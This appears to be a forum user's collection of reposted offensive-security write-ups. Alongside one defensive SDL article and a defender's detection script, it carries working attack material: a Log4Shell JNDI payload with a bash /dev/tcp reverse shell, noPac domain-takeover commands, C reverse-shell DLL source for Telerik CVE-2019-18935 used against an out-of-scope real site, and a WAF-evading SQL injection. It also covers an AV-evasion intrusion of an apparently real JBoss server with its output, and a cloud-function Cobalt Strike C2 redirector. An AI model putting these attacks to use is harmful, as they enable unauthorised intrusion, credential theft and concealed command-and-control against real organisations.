Everything posted by UKhackteam
-
Title: From external-network Log4j2 RCE to the intranet vulnerability combo CVE-2021-42287 and CVE-2021-42278: getting the DC
Network topology

Information collection

The first step in a penetration test is, of course, information collection. Given the IP 192.168.81.151, we first use nmap to scan the common TCP ports:

```
nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88,38080 192.168.81.151
```

Two ports are open: 22 and 38080. From nmap we know this is an Ubuntu host; 22 is SSH and the service on 38080 is unknown, so let's try accessing it. I then tried the newest vulnerability at the time, CVE-2021-44228, to see whether I could get a DNSLog callback. CVE-2021-44228 is present, so let's try to get a shell.

CVE-2021-44228 exploitation

First start an LDAP server on our VPS, Kali (192.168.81.133):

```
git clone https://github.com/black9/Log4shell_JNDIExploit.git
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.81.133
```

Then listen on port 9999 on Kali. We use TomcatBypass for the reverse shell:

```
/bin/bash -i >& /dev/tcp/192.168.210.23/9999 0>&1
```

The reverse-shell command has to be base64-encoded. Capture the request in Burp, change it to a POST parameter and construct the payload:

```
payload=${jndi:ldap://192.168.81.13:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgxLjEzMy85OTk5IDA+JjE=}
```

Finally, the exploit successfully returns a shell.
Note that the base64 payload must be URL-encoded twice for it to execute. I found that the shell I got was inside a Docker container. I failed to find a way to escape it, and finally found the flag file in the /root/ directory: flag{redteam.lab-1}, "Congratulations, you got this: saul Saul123". So I got a flag and something that looks like an account and password. During information collection nmap found the SSH service on port 22 of the target host, so this may well be the SSH account and password.

Intranet information collection

Log in to the Ubuntu system with the account and password obtained in the previous section. We can see that the current machine has two network cards: ens33 connects to the external network and ens38 communicates with the intranet. In real intranet penetration: in a Linux environment, try to do everything in bash and Python, because Linux has them built in; under Windows, try to do everything in PowerShell, bat and VBS. Try not to rely too much on external tools. So we use a for loop to ping the C-segment of ens38:

```
for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo "$i is up"; fi; done
```

There is another machine, 10.0.1.7, on the intranet. Alternatively, use a scanning tool to collect intranet information: quickly start an HTTP server with Python on Kali, download the tool to the target machine and grant execute permission, then collect intranet information. 10.0.1.7 was found alive, and MS17-010 was present. For convenience, I chose frp to proxy the current machine's traffic: configure frps.ini and frpc.ini. Then use Metasploit through the SOCKS5 proxy to collect deeper intranet information:

```
setg Proxies socks5:192.168.81.13:8888
setg ReverseAllowProxy true
```

Use the SMB version detection module to scan the target:

```
use auxiliary/scanner/smb/smb_version
```

The target 10.0.1.7 is Windows 7 and the domain REDTEAM exists.
Since it is Windows 7, MS17-010 may be present.

MS17-010 exploitation

From the previous section we know that 10.0.1.7 is Win7, so we run the check; it confirms that MS17-010 is present on this machine. Since an intranet target does not necessarily have outbound network access, a reverse TCP connection cannot be used, so set the payload to a bind_tcp one. This gives Win7 privileges directly; then load mimikatz to grab the password:

```
meterpreter > load mimikatz     # load the extension
meterpreter > creds_all         # list credentials
```

Username: root, Domain: REDTEAM, Password: Red12345.

Note that this command grabs the password from memory; the range's original state was paused and then restored. If you restart, you need to log in to Win7 once. At this point I have a domain user's account.

Intranet weapons: CVE-2021-42287 and CVE-2021-42278

After collecting information on the current intranet, Win7 turned out to have an intranet network card as well, and the domain controller's IP is 10.0.0.12. Since two domain vulnerabilities, CVE-2021-42287 and CVE-2021-42278, had just been disclosed, try exploiting them directly. The principle: suppose the domain has a domain controller named DC (the machine account corresponding to the domain controller is DC$). The attacker uses CVE-2021-42287 to create a machine account saulGoodman, then changes its sAMAccountName to DC. Using the name DC, a TGT is requested. Then the account's sAMAccountName is changed again so that it no longer matches DC. Now, when the TGT is used, the KDC finds no account named DC in the domain and automatically looks for DC$ instead (DC$ being the sAMAccountName of the real domain controller already in the domain).
The attacker uses the TGT just obtained for S4U2self, impersonating a domain administrator to request a service ticket (ST) for the domain controller DC, and finally obtains domain controller privileges. So use MSF to add a SOCKS5 proxy and a route:

```
run autoroute -s 10.0.0.7/24
```

Then simply add the local proxy. Tool download addresses:

https://github.com/WazeHell/sam-the-admin
https://github.com/Ridter/noPac
https://github.com/waterrr/noPac

Then run the scripts:

```
proxychains python3 sam_the_admin.py 'redteam.lab/root:Red12345' -dc-ip 10.0.0.12 -shell
proxychains python noPac.py redteam.lab/root:'Red12345' -dc-ip 10.0.0.12 -shell --impersonate administrator -use-ldap
proxychains python3 exp.py 'redteam/root:Red12345' -dc-ip 10.0.0.12 -shell
```

Finally, I got the final flag.

Target machine environment: link https://pan.baidu.com/s/18pXdC2f_zDsXONpSUg1fYg, extraction code 8dcy

Original link: http://www.kryst4l.cn/2021/12/22/%E4%BB%8E%E5%A4%96%E7%BD%91-log4j2-RCE-%E5%86%8D%E5%88%B0%E5%86%85%E7%BD%91%E6%A0%B8%E5%BC%B9%E7%BB%84%E5%90%88%E6%8B%B3%E6%BC%8F%E6%B4%9E-CVE-2021-42287%E3%80%81CVE-2021-42278-%E6%8B%BF%E5%88%B0-DC/
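From the defender's side, the sequence just described leaves a trace in the Security log: a computer account is created and then renamed to a name without the trailing $ that matches the DC. The following is an added hunting example, not code from the post or from the noPac/sam-the-admin tools; the event dictionaries, their field names and timestamps are constructed to mirror events 4741 and 4781.

```python
"""Hunt for sAMAccountName spoofing (CVE-2021-42278 / CVE-2021-42287) in Security events.

Defensive example added to this page; it is not code from the original post nor
from the noPac / sam-the-admin tools it links. It follows the sequence the post
describes: a fresh machine account is created, its sAMAccountName is changed to
the domain controller's name without the trailing '$', a TGT is requested under
that name, and the name is changed back. Legitimate computer accounts keep their
trailing '$', so a rename that drops it, or that collides with a DC's name, is
the observable. Records below are constructed dicts modelled on Security log
events 4741 (computer account created) and 4781 (account name changed); the
field names are a simplification of those events, not a product schema.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set


@dataclass
class Finding:
    account: str         # sAMAccountName the object had before the rename chain
    new_name: str        # name it was renamed to
    reasons: List[str]
    newly_created: bool  # a 4741 for this account precedes the rename in this batch
    time: int
    subject: str         # who performed the rename


def bare_name(name: str) -> str:
    """Lower-case sAMAccountName with any trailing '$' removed, for collision checks."""
    return name.rstrip("$").lower()


def hunt_samaccountname_spoofing(events: Iterable[dict], dc_names: Set[str]) -> List[Finding]:
    """Return a Finding for every 4781 rename that drops '$' or collides with a DC name."""
    dc_bare = {bare_name(d) for d in dc_names}
    created: Set[str] = set()   # original names (lower-case) seen in 4741
    alias: Dict[str, str] = {}  # current name (lower) -> original name (lower), across renames
    findings: List[Finding] = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        if ev["EventID"] == 4741:
            created.add(ev["TargetUserName"].lower())
            continue
        if ev["EventID"] != 4781:
            continue
        old, new = ev["OldTargetUserName"], ev["NewTargetUserName"]
        origin = alias.pop(old.lower(), old.lower())
        alias[new.lower()] = origin
        reasons = []
        if old.endswith("$") and not new.endswith("$"):
            reasons.append("machine-account-lost-dollar")
        if bare_name(new) in dc_bare and bare_name(origin) not in dc_bare:
            reasons.append("collides-with-dc-name")
        if reasons:
            findings.append(Finding(origin, new, reasons, origin in created,
                                    ev["Time"], ev.get("SubjectUserName", "?")))
    return findings


# Constructed events following the post's narrative (domain REDTEAM, DC named DC).
SAMPLE_EVENTS = [
    {"EventID": 4741, "Time": 100, "SubjectUserName": "root", "TargetUserName": "saulGoodman$"},
    {"EventID": 4781, "Time": 101, "SubjectUserName": "root",
     "OldTargetUserName": "saulGoodman$", "NewTargetUserName": "DC"},
    # The TGT request for "DC" (event 4768) happens here, then the name is reverted:
    {"EventID": 4781, "Time": 103, "SubjectUserName": "root",
     "OldTargetUserName": "DC", "NewTargetUserName": "saulGoodman$"},
    # Benign rename of a workstation keeps the '$' and touches no DC name.
    {"EventID": 4781, "Time": 200, "SubjectUserName": "helpdesk",
     "OldTargetUserName": "WS01$", "NewTargetUserName": "WS02$"},
]

if __name__ == "__main__":
    for f in hunt_samaccountname_spoofing(SAMPLE_EVENTS, {"DC$"}):
        extra = " (account created moments earlier)" if f.newly_created else ""
        print(f"{f.time}: {f.subject} renamed {f.account} -> {f.new_name}: "
              f"{', '.join(f.reasons)}{extra}")
```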
-
Title: Lite version of SDL implementation practice
1. Preface

Generally, security belongs to the operations and maintenance department. I talked with the O&M director at my previous company about whether some day-to-day security work could be integrated into DevOps; not long after, I left for various reasons. In May 2018 I joined a third-party payment company and spent the first half of the year on various inspections. The regulatory situation was severe, senior leadership attached importance to security (mainly because of supervision), and every department's goals for 2019 were tied to security. Since payment companies face inspections from various regulators, some security work was already done relatively well. After nearly a year of getting familiar with the company, I found application security to be relatively weak. The better solution for this part in the industry is SDL. After communicating with various vendors, I decided to promote it in the company bit by bit.

The picture above shows the standard version of SDL. Since O&M uses DevOps and testing uses automation for functional testing, the version iteration cycle is relatively fast, security staff are insufficient, and SDL's threat modeling is also confusing. If security were added to the entire process it would seriously affect delivery time. So I investigated some industry practices and decided to simplify SDL. The simplified version of SDL is as follows.

2. Lite SDL implementation practice

Security training

One of the cores of SDL is security training, so for security training we did secure coding, security awareness, a security knowledge base, and a security SDK.

Secure coding: we found some Java secure coding specifications and product security design and development security specifications online, combined them with the company's actual business, and released a version.
Because the various regulators have training requirements, we introduced security training and train developers and new hires regularly.

Security awareness: the company has an enterprise WeChat official account that most employees follow, so we promoted awareness there. After the promotion is completed, a small gift is given. Because of insufficient staff, functional testing and security testing are essentially done by the same people; the testing department has been fairly cooperative and we ran some security-testing training for testers, but the effect was not ideal.

Security knowledge base: during vulnerability remediation, many developers did not understand the principle or the fix, so we established a security knowledge base. Developers first check the knowledge base for related solutions; if they cannot find one they talk to security personnel, who continuously update the knowledge base, forming a closed loop.

Security SDK: since the company has an architecture department, the development framework is basically provided by them. After discussing some common vulnerabilities with the architecture department, we had them implement fixes for those vulnerabilities as an SDK. Development only needs to import the JAR package and configure it in the configuration file. There are still many pitfalls that need to be optimized slowly.

3. Security requirements design

The company has a project approval system, and all projects must be set up through it. Security is a mandatory item, and security must also take part in the review meeting. At this point the project manager contacts security personnel, copies a VIP product security design specification, and the security needs are determined from the requirements documents together with the project manager.
After confirming the security requirements, they are added to the requirements document and the security testing time is confirmed. This process applies only to new projects; projects already launched do not follow it, and in the security testing section below we will talk about how that part is handled.

4. Development and security testing

Security testing is mainly divided into code audit, vulnerability scanning, and manual security testing. The security products derived from this fall into three categories: DAST, dynamic application security testing (WVS, AppScan); SAST, static application security testing (Fortify, RIPS); and IAST, interactive application security testing (Seeker, Lijian). For a detailed introduction to these three kinds of products, see https://www.aqniu.com/learn/46910.html. The figure below compares the test results of the three kinds of products. These products can be automated and integrated into DevOps, so next we incorporate these tools into the development and testing phases.

IAST has many implementation modes, commonly proxy mode, VPN, traffic mirroring, and instrumentation mode. This article introduces the two most representative ones: proxy mode and instrumentation mode. Some of the products surveyed are shown in the figure below; the specific test results will not be published.

Development stage

When investigating these products, I found that IAST's instrumentation mode can be placed directly in the development environment. The main difference between the code in the development and test environments is the application.yml configuration file, so this mode can be moved forward into the development stage.
When developers have finished writing code, they submit it to GitLab, deploy it to the development environment and start the application. The developer needs to verify that the function works, and at the same time it can be detected whether there are vulnerabilities. The company uses Rancher in the test environment. We put the IAST jar package into the project's GitLab, pull the code locally during deployment, and add the jar package to the container by modifying the Dockerfile:

```
ADD shell/xxx.jar /home/app/xx/lib
```

Since the company's projects basically use Spring Boot, all projects start the application through a start.sh script. start.sh and the Dockerfile need to be added to the project's GitLab, and the start.sh script is modified at the same time:

```
-javaagent:$APP_HOME/lib/xx.jar -jar $APP_HOME/app/*.jar --spring.profiles.active=dev > $APP_HOME/logs/startup.log 2>&1
```

The test items are as follows (typos ignored): after the submitted code is deployed, exercise the normal functions and you can see on the platform whether there are vulnerabilities. Some products also detect third-party component packages. The company uses Harbor as the image repository: after a project is deployed it is packaged into an image and uploaded to Harbor, and Harbor comes with an image scanning function.

Testing phase

After development is completed, the project enters the testing stage. In this stage we conduct static code scanning, functional testing, and security testing.

Static code scanning

Use a static code scanning tool to scan the code before compilation and find all kinds of problems at the static code level, including security issues. Some tools are listed below. For static code scanning we use SonarQube integrated with Find Security Bugs and a streamlined rule set, and perform static code bug and security scanning during continuous integration. While scanning static code, third-party dependency packages can also be scanned.
OWASP Dependency-Check can be integrated into the continuous integration process; since IAST products support this function, I will not introduce it further.

Functional testing

For functional testing, the company's testing department has implemented an automated test platform. In the early stage we did not use agent-based detection. At the beginning we used the open-source GourdScan plus OpenRASP, with OpenRASP's default non-blocking mode and vulnerability logging enabled, to detect vulnerabilities that are not reflected in the server response. Just configure the proxy IP on the automation platform (OpenRASP vulnerability record). Later, testers reported that the scan produced too much dirty data and the effect was not great, so I gave up this plan. IAST's instrumentation method is used in the development stage, and the test environment also uses the agent to detect problems in the same way as the development environment. After functional testing is completed, since testers do not understand vulnerabilities very well, the specified process is for testers to view the reports on the platform and discuss with security personnel which problems need to be fixed, then write the problems into the test report.

Security testing

Security has been added to the entire testing phase: all requirement changes must complete functional testing, which means all processes pass through security testing. Given that security staff are insufficient, we decided to distinguish internal from external services to determine whether security personnel need to intervene.

Vulnerability management

We formulated a vulnerability management system, and vulnerabilities are rated according to their degree of impact. Serious vulnerabilities must be fixed before release. High-, medium- and low-risk vulnerabilities have a smaller impact and need to be scheduled.
Security personnel regularly track the status of vulnerability fixes.

5. Monitoring

Payment companies generally have security equipment. This part basically sends the devices' syslog to the log center for visualization, and custom rules are used to raise alerts.

6. Conclusion

My personal knowledge and experience of the SDL system are limited and I had no prior experience, so we could only reach the current level. There are many places to optimize and processes to add in the future. If you have any good suggestions, please feel free to get in touch.

Source: https://xz.aliyun.com/t/5656
-
Title: A record of some web vulnerability hunting
I've dug up some vulnerabilities recently. Although they were duplicates, they have reference value, so let me share them here. Getting a duplicate is still very uncomfortable. When you think about it, life is never fully satisfactory. A duplicate does not mean failure; what matters is who comes first and who comes second, and the order of appearance matters.

1. RCE on a certain site

Reason for being ignored: not in scope. Authors: the priest and me. Thanks to the priest for taking me along to test.

Domain name: https://***.***:8089/

CVE-2017-11357, CVE-2019-18935 and CVE-2017-9248 are present. Exploit download address:

https://github.com/noperator/CVE-2019-18935
https://github.com/noperator/CVE-2019-18935.git

Delay 11 s. Test code, test.c:

```c
#include <windows.h>
#include <stdio.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH)
        // Sleep(10000); // time interval in milliseconds
        Sleep(11000);
    return TRUE;
}
```

test.c is compiled to amd642.dll. Run:

```
python CVE-2019-18935.py -v 2017.1.228 -p payloads\amd642.dll -u https://***.****:8089/Telerik.Web.UI.WebResource.axd?type=rau
```

The first step verifies successfully: the delayed request takes about 11 s, the original request 2 s.

Test command execution:

```c
#include <windows.h>
#include <stdio.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /c nslookup rsmwe.dnslog.cn");
        system("cmd.exe /c nslookup 2pstpep28u6vl9qrw0lhjwsr9if83x.burpcollaborator.net");
    }
    return TRUE;
}
```

test.c is compiled to amd642.dll. Run again and check the DNSLog.

Direct reverse shell, the general exp:

```c
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>

#pragma comment(lib, "ws2_32")

#define HOST "{vps ip}"
#define PORT {port}

WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
struct sockaddr_in hax;
char aip_addr[16];
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;

// Adapted from https://github.com/infoskirmish/Window-Tools/blob/master/Simple%20Reverse%20Shell/shell.c
void ReverseShell()
{
    WSAStartup(MAKEWORD(2, 2), &wsaData);
    Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

    struct hostent *host = gethostbyname(HOST);
    strcpy(aip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));

    hax.sin_family = AF_INET;
    hax.sin_port = htons(PORT);
    hax.sin_addr.s_addr = inet_addr(aip_addr);

    WSAConnect(Winsock, (SOCKADDR *)&hax, sizeof(hax), NULL, NULL, NULL, NULL);

    if (WSAGetLastError() == 0) {
        memset(&ini_processo, 0, sizeof(ini_processo));
        ini_processo.cb = sizeof(ini_processo);
        ini_processo.dwFlags = STARTF_USESTDHANDLES;
        ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

        char *myArray[4] = { "cm", "d.e", "x", "e" };
        char command[8] = "";
        snprintf(command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]);

        CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);
    }
}

DWORD WINAPI MainThread(LPVOID lpParam)
{
    ReverseShell();
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    HANDLE hThread;
    if (fdwReason == DLL_PROCESS_ATTACH)
        hThread = CreateThread(0, 0, MainThread, 0, 0, 0);
    return TRUE;
}
```

The privileges are not low: it is a domain user.

2. SQL injection

Background: a friend sent me an injection. This injection is quite tricky: there is a WAF from a certain cloud, and the backend filters commas, single and double quotes, and the regular functions. My idea is very simple: hexadecimal, plus the regexp function. I think there should be other ideas as well.

```
(case+when+current_user+regexp+0x*+then+1+else+2*1e308+end)
```

In this way the database user was brute-forced out. Here I want to talk about the case when statement; it is much more flexible than we imagine.

Here I will take a note and talk about it. The most common form: ... Something unusual: I wrote two demos and could keep going:

```
case 1=1 when 2=2 then 1=1 else 1/0 end
```

3. URL redirect + identity authentication token leak

I dug this up last night; the reason for being ignored is duplicate. Sometimes I am quite speechless about some vendors: the vulnerabilities are there and they are not fixed. It gave me the illusion that I had found a vulnerability while stepping on a honeypot. The asset range is vc-*.xxx.com. Actually I am quite happy to encounter this range because I can do a simple fuzz, and I found a lot of assets. Opening them one by one: visiting vc-ss.xxx.com redirects straight to a login page. I am not a god, and I don't have an account either. I looked at the JS and found no path information. Starting with fuzzing; it's easy if you know it's PHP. Using ffuf with a php/api dictionary, I ran into an interface development document, /api/***.html. The original intention of interface development documents is good, but the screenshots and interface information in most of them carry the risk of secondary exploitation. Although the screenshot information was all plain text, unfortunately after testing I found that almost all interfaces returned 401 and required authentication. I was a little helpless. When I wanted to give up, I told myself to persist and read carefully. I kept staring at the interface document, flipping back and forth, and found an identity token leak and some other security vulnerabilities. I submitted the vulnerability and received a duplicate message in the morning.

Original link: https://www.cnblogs.com/piaomiaohongchen/p/17130283.html
-
Title: An OutLook Information Collection Tool
0x01 Introduction

This is a Burp plug-in for collecting Outlook user information. You can use it after you have logged into your Outlook account; the plug-in automatically crawls all contact information.

0x02 Installation

Just load the jar in the Burp Extender panel.

0x03 Function introduction

1. All Users

After loading the plug-in, enter the Outlook contact panel and click All Users. In Burp's Proxy - HTTP history, filter for the API interface

/owa/service.svc?action=FindPeople&app=People

Select the request and right-click: Extensions - OutLook information collection - Do OoutLook Email scan. Scan progress is displayed in Extender - Extensions - OutLook information collection - Output. The plug-in automatically crawls all packets and generates a directory tree in which each request and response can be viewed. Right-clicking a request brings up the context menu; select Get all user emails to get all emails.

2. Note

This API has a large number of identical URLs with different POST parameters. If you select the wrong API interface, a pop-up will prompt you.

3. Contact information

All packets from All Users must be loaded for this to work, because the contact information is based on the All Users packets; if the first step is not performed, a pop-up will remind you. In Burp's Proxy - HTTP history, filter for the API interface

/owa/service.svc?action=GetPersona&app=People

Select the request and right-click: Extensions - OutLook information collection - Do OoutLook Email scan. Scan progress is displayed in Extender - Extensions - OutLook information collection - Output. The plug-in automatically crawls all packets and generates a directory tree in which each request and response can be viewed. Right-clicking a request brings up the context menu; select Get All User personal information to obtain all contact information.

Tool download: reply with the keyword "OutLook" on the official account.
-
Title: A record of an intranet lateral-movement test with AV evasion
Tool preparation

jexboss, Kali Linux, CS 4.3, Windows AV online query (one, two and three), fscan, Tide shellcode AV evasion, LSTAR and other CobaltStrike plugins, PEASS-ng, PrintSpoofer.

External network service

1. To practice intranet lateral movement, I quietly focused on foreign sites.
2. Found a deserialization vulnerability on a JBoss website. jexboss could not exploit it successfully: python jexboss.py -u https://xx.xx.xx/
3. Exploited successfully with "6 brother's" ultimate deserialization testing tool.
4. Check the current user with whoami: an ordinary user.
5. Check the IP address: ipconfig
6. Check whether AV is present: tasklist /svc
7. Paste the output into the Windows AV online query and find that AV is present.
8. Check whether the server has outbound access: ping www.baidu.com. Very good, the server can reach the Internet.

CS goes online

1. Because AV is present, we need to consider bypassing it; uploading a CS Trojan directly is definitely not possible. This time the Tide shellcode evasion is used, because many exe files packaged with Python on GitHub are too large and upload very slowly, while the Tide shellcode evasion output is small and uploads faster.
2. CS generates shellcode in C.
3. Copy the shellcode into the Tide website, upload the generated exe to the target machine, then execute: C:\\usr\\desarrollo\\jboss-5.1.0.GA\\server\\sigAmeServer\\deploy\\ROOT.war\\TideAv-Go1-2023-02-04-10-31-21-221261.exe tide
4. CS is launched successfully.

Privilege escalation

Information collection

1. View the current user and privileges: whoami, whoami /priv
2. View system version and patch information: systeminfo

```
Nombre de host:                            AMEPROWEBEGAD
Nombre del sistema operativo:              Microsoft Windows 10 Pro
Versión del sistema operativo:             10.0.19044 N/D Compilación 19044
Fabricante del sistema operativo:          Microsoft Corporation
Configuración del sistema operativo:       Estación de trabajo miembro
Tipo de compilación del sistema operativo: Multiprocessor Free
Propiedad de:                              appzusr
Organización registrada:
Id. del producto:                          00331-10000-00001-AA727
Fecha de instalación original:             13/5/2022, 14:03:47
Tiempo de arranque del sistema:            1/2/2023, 16:50:29
Fabricante del sistema:                    VMware, Inc.
Modelo el sistema:                         VMware Virtual Platform
Tipo de sistema:                           x64-based PC
Procesador(es):                            2 Procesadores instalados.
                                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz
                                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz
Versión del BIOS:                          Phoenix Technologies LTD 6.00, 12/11/2020
Directorio de Windows:                     C:\Windows
Directorio de sistema:                     C:\Windows\system32
Dispositivo de arranque:                   \Device\HarddiskVolume1
Configuración regional del sistema:        es-mx;Español (México)
Idioma de entrada:                         es-mx;Español (México)
Zona horaria:                              (UTC-06:00) Guadalajara, Ciudad de México, Monterrey
Cantidad total de memoria física:          4.095 MB
Memoria física disponible:                 1.201 MB
Memoria virtual: tamaño máximo:            4.799 MB
Memoria virtual: disponible:               1.147 MB
Memoria virtual: en uso:                   3.652 MB
Ubicación(es) de archivo de paginación:    C:\pagefile.sys
Dominio:                                   ame.local
Servidor de inicio de sesión:              \\AMEPROWEBEGAD
Revisión(es):                              4 revisión(es) instaladas.
                                           [01]: KB5004331
                                           [02]: KB5003791
                                           [03]: KB5006670
                                           [04]: KB5005699
Tarjeta(s) de red:                         1 Tarjetas de interfaz de red instaladas.
                                           [01]: Intel(R) PRO/1000 MT Network Connection
                                                 Nombre de conexión: Ethernet0
                                                 DHCP habilitado:    No
                                                 Direcciones IP
                                                 [01]: 172.16.2.100
                                                 [02]: fe80::591:ae09:eee1:888e
Requisitos de Hyper-V:                     Se detectó un hipervisor. No se mostrarán las características necesarias para Hyper-V.
```

3. View open ports and services: netstat -ano

```
Conexiones activas

  Proto  Dirección local         Dirección remota        Estado          PID
  TCP    0.0.0.0:135             0.0.0.0:0               LISTENING       600
  TCP    0.0.0.0:445             0.0.0.0:0               LISTENING       4
  TCP    0.0.0.0:1090            0.0.0.0:0               LISTENING       7600
  TCP    0.0.0.0:1098            0.0.0.0:0               LISTENING       7600
  TCP    0.0.0.0:1099            0.0.0.0:0               LISTENING       7600
  TCP    0.0.0.0:3389            0.0.0.0:0               LISTENING       1072
  TCP    0.0.0.0:3873            0.0.0.0:0               LISTENING       7600
  TCP    0.0.0.0:4444            0.0.0.0:0               LISTENING       7600
  TCP    0.0.0.0:4445            0.0.0.0:0               LISTENING       7600
  TCP    0.0.0.0:4446            0.0.0.0:0               LISTENING       7600
  TCP    0.0.0.0:4457            0.0.0.0:0               LISTENING       7600
  TCP    0.0.0.0:4712            0.0.0.0:0               LISTENING       7600
  TCP    0.0.0.0:4713            0.0.0.0:0               LISTENING       7600
  TCP    0.0.0.0:5040            0.0.0.0:0               LISTENING       6652
  TCP    0.0.0.0:5985            0.0.0.0:0               LISTENING       4
  TCP    0.0.0.0:7070            0.0.0.0:0               LISTENING       3564
  TCP    0.0.0.0:8009            0.0.0.0:0               LISTENING       7600
  TCP    0.0.0.0:8080            0.0.0.0:0               LISTENING       7600
  TCP    0.0.0.0:8083            0.0.0.0:0               LISTENING       7600
  TCP    0.0.0.0:46305           0.0.0.0:0               LISTENING       7600
  TCP    0.0.0.0:47001           0.0.0.0:0               LISTENING       4
  TCP    0.0.0.0:49664           0.0.0.0:0               LISTENING       832
  TCP    0.0.0.0:49665           0.0.0.0:0               LISTENING       680
  TCP    0.0.0.0:49666           0.0.0.0:0               LISTENING       1416
  TCP    0.0.0.0:49667           0.0.0.0:0               LISTENING       1612
  TCP    0.0.0.0:49668           0.0.0.0:0               LISTENING       2452
  TCP    0.0.0.0:49671           0.0.0.0:0               LISTENING       832
  TCP    0.0.0.0:49672           0.0.0.0:0               LISTENING       3404
  TCP    0.0.0.0:49704           0.0.0.0:0               LISTENING       820
  TCP    0.0.0.0:49708           0.0.0.0:0               LISTENING       3048
  TCP    0.0.0.0:51407           0.0.0.0:0               LISTENING       7600
  TCP    127.0.0.1:5140          0.0.0.0:0               LISTENING       7172
  TCP    127.0.0.1:51411         0.0.0.0:0               LISTENING       7600
  TCP    172.16.2.100:139        0.0.0.0:0               LISTENING       4
  TCP    172.16.2.100:8080       172.16.12.34:42602      TIME_WAIT       0
  TCP    172.16.2.100:8080       172.16.12.34:42610      ESTABLISHED     7600
  TCP    172.16.2.100:8080       172.16.12.34:55672      TIME_WAIT       0
  TCP    172.16.2.100:8080       172.16.12.34:55686      TIME_WAIT       0
  TCP    172.16.2.100:49717      38.90.226.62:8883       ESTABLISHED     3576
  TCP    172.16.2.100:50848      172.16.2.100:51407      TIME_WAIT       0
  TCP    172.16.2.100:51413      172.16.2.190:1433       ESTABLISHED     7600
  TCP    172.16.2.100:51447      172.16.2.190:1433       ESTABLISHED     7600
  TCP    172.16.2.100:56063      172.16.2.11:2222        ESTABLISHED     3576
  TCP    172.16.2.100:56538      92.223.66.48:443        ESTABLISHED     3564
  TCP    [::]:135                [::]:0                  LISTENING       600
  TCP    [::]:445                [::]:0                  LISTENING       4
  TCP    [::]:1090               [::]:0                  LISTENING       7600
  TCP    [::]:1098               [::]:0                  LISTENING       7600
  TCP    [::]:1099               [::]:0                  LISTENING       7600
  TCP    [::]:3389               [::]:0                  LISTENING       1072
  TCP    [::]:3873               [::]:0                  LISTENING       7600
  TCP    [::]:4444               [::]:0                  LISTENING       7600
  TCP    [::]:4445               [::]:0                  LISTENING       7600
  TCP    [::]:4446               [::]:0                  LISTENING       7600
  TCP    [::]:4457               [::]:0                  LISTENING       7600
  TCP    [::]:4712               [::]:0                  LISTENING       7600
  TCP    [::]:4713               [::]:0                  LISTENING       7600
  TCP    [::]:5985
```
-
Title: Use Tencent Cloud Function to launch CS
First, we need to log in to Tencent Cloud and enable Cloud Functions. After logging in, search for "cloud functions" and open it; on first login, authorization is required. In the console, click Create. The function name is free; choose "start from scratch", select Python 3.6 as the environment, scroll down after selecting, and put the code inside. Copy the following code and modify the server address:

```python
# coding: utf8
import json, requests, base64


def main_handler(event, context):
    response = {}
    path = None
    headers = None
    try:
        C2 = 'http://43.134.164.72:80'
        if 'path' in event.keys():
            path = event['path']
        if 'headers' in event.keys():
            headers = event['headers']
        if 'httpMethod' in event.keys() and event['httpMethod'] == 'GET':
            resp = requests.get(C2 + path, headers=headers, verify=False)
        else:
            resp = requests.post(C2 + path, data=event['body'], headers=headers, verify=False)
        print(resp.headers)
        print(resp.content)
        response = {
            'isBase64Encoded': True,
            'statusCode': resp.status_code,
            'headers': dict(resp.headers),
            'body': str(base64.b64encode(resp.content))[2:-1]
        }
    except Exception as e:
        print('error')
        print(e)
    finally:
        return response
```

When finished, click Save. Then click Trigger Management to create a trigger; the format is as follows. Click the API name to edit it and you arrive at this page.
Change the path to /. Click "Publish service" when done. Next, add the C2 profile, saved as win_tecent_cloud_func.profile:

    set sample_name 't';
    set sleeptime '3000';
    set jitter '0';
    set maxdns '255';
    set useragent 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)';

    http-get {
        set uri '/api/x';
        client {
            header 'Accept' '*/*';
            metadata {
                base64;
                prepend 'SESSIONID=';
                header 'Cookie';
            }
        }
        server {
            header 'Content-Type' 'application/ocsp-response';
            header 'content-transfer-encoding' 'binary';
            header 'Server' 'Nodejs';
            output {
                base64;
                print;
            }
        }
    }

    http-stager {
        set uri_x86 '/vue.min.js';
        set uri_x64 '/bootstrap-2.min.js';
    }

    http-post {
        set uri '/api/y';
        client {
            header 'Accept' '*/*';
            id {
                base64;
                prepend 'JSESSION=';
                header 'Cookie';
            }
            output {
                base64;
                print;
            }
        }
        server {
            header 'Content-Type' 'application/ocsp-response';
            header 'content-transfer-encoding' 'binary';
            header 'Connection' 'keep-alive';
            output {
                base64;
                print;
            }
        }
    }

After saving, put it in the cs directory and start the team server:

    ./teamserver vpsip admin12345 win_tecent_cloud_func.profile

